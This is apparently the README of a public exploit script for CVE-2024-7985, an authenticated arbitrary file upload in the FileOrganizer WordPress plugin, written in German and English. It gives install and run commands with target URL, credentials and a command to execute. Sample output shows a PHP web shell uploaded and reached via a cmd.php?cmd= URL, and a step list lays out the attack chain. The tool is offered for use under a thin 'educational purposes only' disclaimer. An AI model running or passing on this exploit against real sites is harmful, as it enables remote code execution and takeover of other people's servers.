
FileOrganizer <= 1.0.9 - Authentifiziert (Subscriber+) Beliebiger Dateiupload
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload
CVE-2024-7985 - WordPress Plugin FileOrganizer <= 1.0.9 ist anfällig für authentifizierte beliebige Datei-Uploads, die es Angreifern mit Subscriber+-Rechten ermöglicht, schädliche Dateien aus der Ferne hochzuladen und auszuführen. Diese Schwachstelle entsteht durch fehlende Dateitypprüfung in der Funktion fileorganizer_ajax_handler, was Remote Code Execution (RCE) ermöglicht.
🚨 Dieser Exploit erlaubt es Angreifern, beliebige Befehle auf dem Server auszuführen! 🚨
requestsbeautifulsoup4Abhängigkeiten installieren:
pip install requests beautifulsoup4
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi
options:
-h, --help show this help message and exit
--url URL Target WordPress site URL
--username USERNAME WordPress Username
--password PASSWORD WordPress Password
--cmd CMD Command to execute in uploaded file
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
1️⃣ Versionsprüfung - Stellt fest, ob die Website verwundbar ist.
2️⃣ Authentifizierung - Meldet sich bei WordPress an.
3️⃣ Nonce-Extraktion - Ruft das Sicherheitstoken ab.
4️⃣ Datei-Upload - Lädt ein schädliches PHP-Skript hoch.
5️⃣ Befehlsausführung - Führt benutzerdefinierte Befehle aus.
Dieses Skript dient nur zu Bildungszwecken; der Autor übernimmt keine Verantwortung für Missbrauch oder Folgen. 🚨